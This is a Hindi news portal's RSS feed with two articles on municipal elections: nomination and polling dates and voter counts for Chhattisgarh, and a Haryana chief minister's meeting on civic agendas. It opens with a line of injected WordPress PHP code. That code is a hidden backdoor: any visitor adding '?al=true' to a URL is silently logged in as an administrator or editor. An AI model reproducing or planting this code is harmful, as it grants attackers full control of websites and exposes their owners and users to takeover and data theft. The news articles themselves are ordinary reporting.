// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); civic elections – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 22 Jan 2025 15:35:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-निकाय चुनाव में प्रत्याशी आज से जमा करेंगे नामांकन, 28 जनवरी तय की लास्ट डेट https://pratyushaashakinayikiran.com/?p=124167 Wed, 22 Jan 2025 15:35:00 +0000 https://pratyushaashakinayikiran.com/?p=124167 रायपुर.

छत्तीसगढ़ में नगरीय निकाय चुनाव एक चरण में चुनाव होगा. इसके लिए 22 जनवरी यानि आज से नामांकन की प्रक्रिया शुरू हो जाएगी. आज से प्रत्याशी अपना नामांकन रिटर्निंग अफसर या सहायक रिटर्निंग अफसर के समक्ष जमा कर सकेंगे.

नामांकन दाखिल का अंतिम तारीख 28 जनवरी रखा गया है. 25 और 26 जनवरी को नामांकन जमा नहीं किए जाएंगे. निकायों के निर्वाचन क्षेत्रों में 11 फरवरी को मतदान होगा. वहीं 15 फरवरी को मतों की गणना कर परिणाम घोषित किया जाएगा. नगरीय निकाय चुनाव 25 दिनों में पूरे हो जाएंगे। बता दें कि 2025 के निकाय चुनाव में प्रदेश के 14 नगर निगमों में से 10 नगर पालिक निगम, 54 नगर पालिकाओं में से 45 नगर पालिका परिषद और 124 नगर पंचायतों में से 114 नगर पंचायत अध्यक्षों के लिए चुनाव होंगे.

रायपुर जिले में बनाए गए 1290 मतदान केंद्र
रायपुर जिले में नगरीय निकायों में कुल 1290 मतदान केंद्र होंगे. रायपुर नगर निगम के 70 वार्डो में 1095 मतदान केंद्र होंगे. जबकि त्रिस्तरीय पंचायत चुनाव के लिए 1378 मतदान केंद्र होंगे. इसके साथ ही नगरीय निकाय में 69 और त्रिस्तरीय पंचायत के लिए 4 सहायक मतदान केंद्र होंगे.

रायपुर नगर निगम में कुल 10 लाख 36 हजार 79 वोटर
नगरीय निकाय को 107 और त्रिस्तरीय पंचायत को 97 सेक्टरों में बांटा गया है. वहीं मतदाता संख्या की बात करें तो रायपुर नगर निगम में कुल 10 लाख 36 हजार 79 मतदाता वोट डालेंगे. नगरीय निकाय चुनाव में 11 रिटर्निंग ऑफिसर होंगे. वहीं पंचायत में 5 रिटर्निंग और 74 सहायक रिटर्निंग ऑफिसर नियुक्त किए गए हैं. उन्होंने आगे बताया कि मतदान के केंद्रों की सूची का प्रकाशन 27 जनवरी तक होगा. चुनाव चिन्ह का प्रकाशन 6 फरवरी तक होगा.

]]>
हरियाणा में निकाय चुनाव को लेकर सैनी सरकार एक्टिव https://pratyushaashakinayikiran.com/?p=89080 Thu, 24 Oct 2024 15:36:00 +0000 https://pratyushaashakinayikiran.com/?p=89080 पंचकूला

हरियाणा निवास में निकाय अधिकारियों के साथ बैठक करते मुख्यमंत्री नायब सैनी और साथ में हैं मंत्री विपुल गोयल।

विधानसभा चुनाव में ऐतिहासिक जीत के बाद अब भाजपा का फोकस नगर निकाय चुनाव हैं। इस चुनाव में भाजपा जीतकर ग्राउंड स्तर तक शहरों में अपनी पैठ बनाना चाहती है। इसको लेकर मुख्यमंत्री नायब सिंह सैनी अभी से एक्टिव दिखाई दे रहे हैं।

पार्षदों और विधायकों तक के एजेंडों पर की गई मंत्रणा

इस बैठक में 14 से अधिक विषयों पर चर्चा की गई। बैठक में ज्यादा जोर शहरी साफ-सफाई, बेसहारा पशु को पकड़ने और प्रॉपर्टी टैक्स सहित कई विषयों पर चर्चा की गई। साथ ही मुख्यमंत्री ने आदेश दिए कि सभी नगर निकाय का सोशल मीडिया अकाउंट बनाया जाए। अकाउंट को रेगुलर अपडेट किया जाए। इसमें निकायों द्वारा किए जा रहे काम और पब्लिक से जुड़ी सूचनाएं अपडेट की जाएं।

इन एजेंडों पर की गई चर्चा

शपथ लेने के बाद सीएम सैनी ने पहली बैठक नगर निकायों की बुलाई है। एजेंडे में सफाई व्यवस्था, सड़कों की मरम्मत व इसकी सफाई, प्रॉपर्टी आईडी, लाल डोरा क्षेत्र में प्रॉपर्टी सर्टिफिकेट, प्रॉपर्टी बंटवारे के मामले, 22 अक्टूबर से शुरू समाधान शिविर, निकायों के सोशल मीडिया अकाउंट, 100 दिन का कार्यक्रम, विधायकों द्वारा दिए गए इंजीनियरिंग व विकास कार्य, स्वामित्व स्कीम, पीएम स्वनिधि में लोन के मामले, वैध और अवैध कॉलोनियां और नई स्वीकृत कॉलोनियों के विकास कार्य पर चर्चा की गई।

]]>